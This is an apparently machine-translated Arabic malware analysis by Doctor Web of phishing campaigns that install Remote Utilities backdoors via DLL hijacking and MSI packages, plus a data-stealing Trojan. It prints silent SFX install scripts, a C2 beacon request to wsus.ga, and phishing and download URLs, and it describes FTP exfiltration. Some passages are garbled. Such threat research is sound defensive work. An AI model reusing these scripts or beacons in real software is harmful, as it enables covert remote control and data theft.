في تشرين الثاني (نوفمبر) 2020 ، اكتشف مختبر الفيروسات التابع لـ Doctor Web توزيع رسائل البريد الإلكتروني المخادعة على مستخدمي الشركات. حاول المهاجمون استخدام طريقة الهندسة الاجتماعية الكلاسيكية لإجبار الضحايا المحتملين على فتح المرفقات. احتوت رسائل البريد الإلكتروني على أحصنة طروادة كحمل ضار ، مما يضمن التثبيت الخفي وتشغيل الأداة المساعدة Remote Utilities ، والتي تم تضمين مكونات التثبيت الخاصة بها أيضًا في المرفق. في مجموعة من الظروف غير المواتية ، ستكون أجهزة كمبيوتر الموظفين متاحة للتحكم عن بعد دون أي علامات مرئية لتشغيل البرنامج. في هذه المقالة ، سوف نلقي نظرة على آليات التوزيع والإصابة بأحصنة طروادة RAT المستخدمة.
سيناريو الهجوم
يمكن تقسيم العينات التي وجدناها إلى مجموعتين.
- , Remote Utilitites , DLL Hijacking. , . Dr.Web BackDoor.RMS.180.
- , Remote Utilities MSI-, . Dr.Web BackDoor.RMS.181.
يتم توحيد مجموعتي البرامج الضارة ليس فقط من خلال الأداة المستخدمة - Remote Utilities - ولكن أيضًا من خلال تنسيق رسائل البريد الإلكتروني المخادعة. هذه رسائل مكتوبة بشكل جيد وكبيرة نسبيًا باللغة الروسية ، باستخدام موضوع يحتمل أن يكون ممتعًا للمستلم. الحمولة الضارة محمية بكلمة مرور ، وكلمة المرور نفسها في شكل ملف TXT موجودة في مكان قريب وتمثل تاريخ إرسال الرسالة.
مثال على رسالة بها مرفق ضار باستخدام DLL Hijacking:
يحتوي الأرشيف المرفق على أرشيف RAR محمي وملف نصي بكلمة مرور.
لسرية المرفق المرسل ، يتم تعيين كلمة مرور تلقائية: 02112020.
يحتوي الأرشيف على قطارة في شكل RAR ذاتية الاستخراج مع BackDoor.RMS.180 نفسها بالداخل .
يوجد أدناه مثال على حرف به مرفق باستخدام حزمة MSI.
بالإضافة إلى الأرشيف الذي يحتوي على تحميل ضار ( BackDoor.RMS.181 ) وملف كلمة المرور ، توجد مستندات وهمية هنا.
نظرًا لسياسة أمان الشركة ، فإن هذا المرفق محمي برمز الوصول: 12112020.
أثناء بحثنا ، وجدنا أيضًا عينة من رسالة بريد إلكتروني للتصيد تحتوي على رابط إلى أداة قطارة تقوم بتشغيل تثبيت الأداة المساعدة Remote Utilities من حزمة MSI تم تكوينها (اكتشفها Dr.Web كـ BackDoor.RMS.187 ). وتشارك هنا آلية مختلفة قليلاً لنشر الحمولة.
"CV_resume.rar" هو رابط لموقع تم اختراقه ، حيث تحدث إعادة توجيه إلى مورد آخر لتنزيل أرشيف ضار من BackDoor.RMS.187 .
كشف تحليل للبنية التحتية للشبكة التي يستخدمها مجرمو الإنترنت لنشر BackDoor.RMS.187 عن العديد من المواقع المعرضة للخطر ، بالإضافة إلى عينة من Trojan.Gidra. وفقًا لبياناتنا ، Trojan.GidraNET.1تم استخدامه لإصابة النظام مبدئيًا باستخدام بريد إلكتروني للتصيد الاحتيالي متبوعًا بتنزيل باب خلفي قام بتثبيت أدوات التحكم عن بعد سراً.
للحصول على تحليل مفصل لخوارزميات البرنامج المكتشف ، اقرأ مكتبة الفيروسات على موقعنا على الإنترنت. سنلقي نظرة سريعة على هذه البرامج الضارة أدناه.
باب خلفي RMS 180
حصان طروادة مستتر مكتوب باستخدام مكونات Remote Utilities. يتم تحميل الوحدة الخبيثة الرئيسية عبر اختطاف DLL.
يتم تشغيل أرشيف الاستخراج الذاتي بواسطة البرنامج النصي:
;і і SFX-
Path=%APPDATA%\Macromedia\Temp\
Setup=WinPrint.exe
Silent=1
Overwrite=2
تكوين قطارة ذاتية الاستخراج:
- libeay32.dll (f54a31a9211f4a7506fdecb5121e79e7cdc1022e) ، نظيف ؛
- ssleay32.dll (18ee67c1a9e7b9b82e69040f81b61db9155151ab) ، نظيف ؛
- UniPrint.exe (71262de7339ca2c50477f76fcb208f476711c802) ، موقّع بتوقيع صالح ؛
- WinPrint.exe (3c8d1dd39b7814fdc0792721050f953290be96f8) ، موقّع بتوقيع صالح ؛
- winspool.drv (c3e619d796349f2f1efada17c9717cf42d4b77e2) هي الوحدة الخبيثة الرئيسية التي تضمن التشغيل الخفي للمرافق البعيدة.
جدول الوظائف المصدرة winspool.drv:
118 RemoveYourMom
119 AddFormW
144 ClosePrinter
148 OpenDick
156 DeleteFormW
189 DocumentPropertiesW
190 HyXyJIuHagoToA
195 EnumFormsW
203 GetDefaultPrinterW
248 EnumPrintersW
273 GetFormW
303 OpenPrinterW
307 PrinterProperties
وظائف غائبة في الوحدة النمطية winspool.drv الأصلية ولا تحمل عبءًا وظيفيًا:
تحتوي الصادرات ذات الأسماء الحقيقية على انتقالات إلى الوظائف الأصلية التي تم تحميلها في المستقبل من مكتبة شرعية.
يتم تنفيذ بعض وظائف API من خلال المؤشرات إلى وصلات العبور : تبحث
وظيفة get_proc عن وظيفة API المطلوبة عن طريق تحليل جدول تصدير الوحدة النمطية ، ثم تضع العنوان الذي تم العثور عليه بدلاً من وظيفة الانتقال .
في المرحلة الأولى ، يتم تحميل المكتبة المستبدلة. الاسم ليس مشفرًا بشكل ثابت ، لذلك يقوم بتحميل مكتبة <system_directory> \ <module_filename> . ثم يمر عبر جدول التصدير الخاص به ويقوم بتحميل وظائف API الأصلية عن طريق الترتيب الترتيبي ، متخطياً الوظائف غير الصالحة:
RemoveYourMom OpenDick HyXyJIuHagoToA
ثم يتحقق الباب الخلفي في سياق الملف القابل للتنفيذ الذي يتم تشغيله. للقيام بذلك ، يتحقق من القيمة IMAGE_NT_HEADERS.OptionalHeader.CheckSum للوحدة النمطية الرئيسية القابلة للتنفيذ:
- القيمة هي 0x2ECF3 - بدء التشغيل الأولي باستخدام WinPrint.exe ؛
- القيمة هي 0xC9FBD1 - العمل في سياق UniPrint.exe.
إذا كان WinPrint.exe قيد التشغيل ، يقوم الباب الخلفي بإنشاء عملية UniPrint.exe ويخرج.
عندما يتم تشغيل UniPrint.exe ، يستمر الباب الخلفي لأداء الوظائف الأساسية. للتحقق مما إذا كان المستخدم لديه حقوق وصول المسؤول. ثم يقوم بتعيين أذونات الدليل مع وحدة:
بعد ذلك، يكتب عامة و الأمن المعلمات إلى مفتاح التسجيل \ WDMPrint HKCU \ SOFTWARE ويعد InternetID قيمة المعلمة باستخدام سلسلة تنسيق.
ثم يقوم الباب الخلفي بإنشاء نوافذ MDICLIENT و RMSHDNLT مخفية :
بعد ذلك ، يشرع في اعتراض وظائف API. يستخدم مكتبة MinHook لهذا الغرض .
يمكن العثور على جدول مفصل مع وصف الوظائف التي تم اعتراضها على صفحة BackDoor.RMS.180 على موقعنا على الإنترنت.
يتم تنفيذ نشاط شبكة الباب الخلفي على النحو التالي. أولاً ، باستخدام مقبض نافذة TEdit باستخدام وظيفة GetWindowTextA ، يحصل الباب الخلفي على معرف الإنترنت المطلوب للاتصال عن بُعد. ثم يشكل طلب GET للنموذج:
GET /command.php?t=2&id=<Internet-ID> HTTP/1.1
Host: wsus.ga
Accept-Charset: UTF-8
User-Agent: Mozilla/5.0 (Windows NT)
Connection: close
ثم يقوم بإنشاء مأخذ توصيل TCP. للتحقق من قيمة المتغير الشامل الذي يخزن المنفذ لاتصال SSL (صفر في هذا المثال). إذا كان المنفذ لا يساوي الصفر ، فسيتم الاتصال عبر SSL باستخدام وظائف مكتبة SSLEAY32.dll. إذا لم يتم تحديد المنفذ ، يتصل الباب الخلفي عبر المنفذ 80.
ثم يرسل الطلب الذي تم إنشاؤه. في حالة تلقي رد ، ينتظر لمدة دقيقة ويعيد إرسال الطلب باستخدام معرف الإنترنت . في حالة عدم وجود إجابة ، يتكرر الطلب بعد ثانيتين. يحدث الإرسال في حلقة لا نهاية لها.
باب خلفي RMS.181
العينة التي تم تحليلها عبارة عن حزمة MSI مع معلمات مكونة مسبقًا للتحكم عن بعد ، تم إنشاؤها باستخدام مُكوِّن MSI من Remote Utilities Viewer. تم توزيعه كجزء من قطارة 7z ذاتية الاستخراج (52c3841141d0fe291d8ae336012efe5766ec5616).
تكوين القطارة:
- host6.3_mod.msi (حزمة MSI سابقة التكوين) ؛
- installer.exe (5a9d6b1fcdaf4b2818a6eeca4f1c16a5c24dd9cf) موقعة بتوقيع رقمي صالح.
برنامج نصي لإطلاق أرشيف استخراج ذاتي:
;!@Install@!UTF-8!
RunProgram="hidcon:installer.exe /rsetup"
GUIMode="2"
;!@InstallEnd@!
بعد التفريغ ، يقوم القطارة بتشغيل ملف installer.exe ، والذي بدوره يبدأ تثبيت حزمة MSI المكونة مسبقًا. يقوم المثبت باستخراج وتثبيت Remote Utilities بشكل سري. بعد التثبيت ، يرسل إشارة إلى خادم الإدارة.
تحتوي حزمة MSI على جميع المعلمات الضرورية لتثبيت Remote Utilities بصمت. يتم إجراء التثبيت في Program Files \ Remote Utilities - Host وفقًا لجدول Directory .
وفقًا لجدول CustomAction ، يقوم مُثبِّت msiexec.exe بتشغيل المكون الرئيسي لحزمة Remote Utilities rutserv.exe بمعلمات مختلفة توفر التثبيت الصامت وإضافة قواعد جدار الحماية وبدء الخدمة.
يتم إدخال معلمات الاتصال وإعداداته في مفتاح التسجيل HKLM \ Remote Utilities \ v4 \ Server \ Parameters . تم تضمين قيم المعلمات في جدول التسجيل : تحتوي
معلمة CallbackSettings على عنوان الخادم الذي تم إرسال InternetID إليه للاتصال المباشر.
باب خلفي RMS.187
العينة التي تم فحصها عبارة عن حزمة MSI مع معلمات تم تكوينها مسبقًا لتثبيت وتشغيل الأدوات المساعدة عن بُعد بصمت. تم توزيعه كجزء من أرشيف RAR ضار عن طريق قوائم بريدية للتصيد الاحتيالي.
يتم تشغيله باستخدام قطارة تخزن أرشيف التثبيت في قسم الموارد تحت الاسم LOG . يقوم القطارة بحفظ حزمة MSI في الدليل ٪ TEMP٪ تحت الاسم KB8438172.msi ثم يقوم بتشغيل msiexec.exe باستخدام المثبت. يحتوي القطارة على المسار إلى المصدر - C: \ Users \ Kelevra \ Desktop \ Source \ Project1.vbp .
يشير الباب الخلفي إلى أنه جاهز للاتصال عن طريق إرسال رسالة إلى cerbe [@] protonmail [.] Com .
تتميز هذه العينة بالطريقة التي تم بها توزيعها. يتلقى الضحية بريدًا إلكترونيًا للتصيد الاحتيالي يحتوي على رابط متنكر كمرفق يحتاجه المستخدم.
رابط لتحميل المرفقات وفي HTTP [:] // ateliemilano رو / القانون الأساسي / amsweb.php eTmt6lRmkrDeoEeQB6MOVIKq4BTmbNCaI6vj٪ 2FvgYEbHFcfWecHRVZGMpkK٪ 2BMqevriOYlq9CFe6NuQMfKPsSNIax3bNKkCaPPR0RA85HY4Bu٪ 2B٪ 2B6xw2oPITBvntn2dh0QCN9pV5fzq3T 2FnW270rsYkctA ٪٪٪ 2FwdvWH1bkEt2AdWnyEfaOwsKsSpyY3azVX0D 2BKOm5 [.]؟ .
ثم ، من هذا العنوان ، تحدث إعادة توجيه إلى العنوان https [:] // kiat [.] By / Recruitment / CV_Ekaterina_A_B_resume.rar ، والتي تُستخدم لتنزيل الأرشيف الضار.
ateliemilano [.] ru و kiat [.] بواسطة- المواقع الموجودة ، بينما الموقع الثاني تابع لوكالة توظيف. وفقًا لمعلوماتنا ، فقد تم استخدامها مرارًا وتكرارًا لتنزيل أحصنة طروادة ، وكذلك لإعادة توجيه الطلبات لتنزيلها.
في سياق البحث ، تم العثور على مواقع مخترقة أخرى تم استخدامها لتوزيع قطارات مماثلة مع حزم MSI. في بعضها ، تم تثبيت عمليات إعادة التوجيه من نفس التنسيق على موقع ateliemilano [.] Ru . يُزعم أن بعض الموارد قد حملت أحصنة طروادة المكتوبة في
Visual Basic .NET ( Trojan.GidraNET.1 ) ، والتي ، من بين أشياء أخرى ، تقوم بتنزيل ملفات ضارة إلى أجهزة الكمبيوتر المعرضة للخطر.
حصان طروادة .GidraNET.1
تم توزيع عينة طروادة التي تم فحصها عبر المواقع المخترقة. إنه مصمم لجمع معلومات حول النظام مع نقله لاحقًا إلى مجرمي الإنترنت عبر FTP ، وكذلك لتنزيل قطارة ضارة مع حزمة MSI لتثبيت Remote Utilities.
الوظيفة الرئيسية في أسلوب readConfig الذي يتم استدعاؤه من Form1_Load .
تقوم في بداية عملها بجمع المعلومات التالية عن النظام:
- عنوان IP خارجي ؛
- اسم المستخدم؛
- اسم الكمبيوتر ؛
- إصدار نظام التشغيل؛
- معلومات حول اللوحة الأم والمعالج ؛
- مقدار ذاكرة الوصول العشوائي
- معلومات حول الأقراص والأقسام ؛
- محولات الشبكة وعناوين MAC الخاصة بهم ؛
- محتويات الحافظة.
يتم حفظ المعلومات الناتجة في ملف ، ثم يأخذ لقطة شاشة.
يرسل معلومات حول النظام عبر FTP إلى خادم ateliemilano [.] Ru .
يحتوي رمز حصان طروادة على معلومات تسجيل دخول وكلمة مرور لخادم FTP. يتم إنشاء دليل منفصل لكل كمبيوتر مصاب.
بعد إرسال المعلومات ، يقوم بتنزيل الملف وتشغيله من خادم آخر مخترق.
الملفات التي تم تنزيلها مع نماذج مماثلة هي ملفات droppers مكتوبة في Visual Basic تحتوي على حزم MSI للتثبيت المخفي لأدوات التحكم عن بعد ، مثل BackDoor.RMS.187 .
في العينة التي تم فحصها ، تم العثور على المسار إلى ملف PDB: C: \ Users \ Kelevra \ Desktop \ Last Gidra + PrintScreen + Loader_ Main \ Gidra \ obj \ Debug \ Gidra.pdb... اسم مستخدم Kelevra هو نفس اسم المستخدم في المسار إلى ملف المشروع في BackDoor.RMS.187 القطارة: C: \ Users \ Kelevra \ Desktop \ Source \ Project1.vbp . تم العثور على متغيرات أخرى في عينات مماثلة.
استنادًا إلى المعلومات التي وجدناها ، يمكننا أن نفترض أنه في عام 2019 استخدم مؤلف Trojan.GidraNET.1 حصان طروادة هذا للإصابة الأولية من خلال رسالة بريد إلكتروني للتصيد الاحتيالي ، متبوعًا بتنزيل باب خلفي يقوم بتثبيت أدوات التحكم عن بُعد بشكل سري.
استنتاج
لا تزال الأبواب الخلفية التي تعتمد على أدوات الإدارة عن بُعد تشكل تهديدًا أمنيًا ملحًا ولا تزال تستخدم لمهاجمة قطاع الشركات. بدورها ، تعتبر رسائل البريد الإلكتروني المخادعة هي الوسيلة الرئيسية لتوصيل الحمولات إلى أجهزة الكمبيوتر المصابة. الميزة المميزة للمرفقات الضارة هي أرشفة الحمولة باستخدام كلمة مرور ، مما يسمح للرسالة بالتغلب على الحماية المضمنة في خادم البريد. ميزة أخرى هي وجود ملف نصي بكلمة مرور للأرشيف المزيف. بالإضافة إلى ذلك ، فإن استخدام مكتبة ضارة وهجمات اختطاف DLL يتيح التشغيل الخفي لبرامج التحكم عن بعد على جهاز مخترق.
مؤشرات التسوية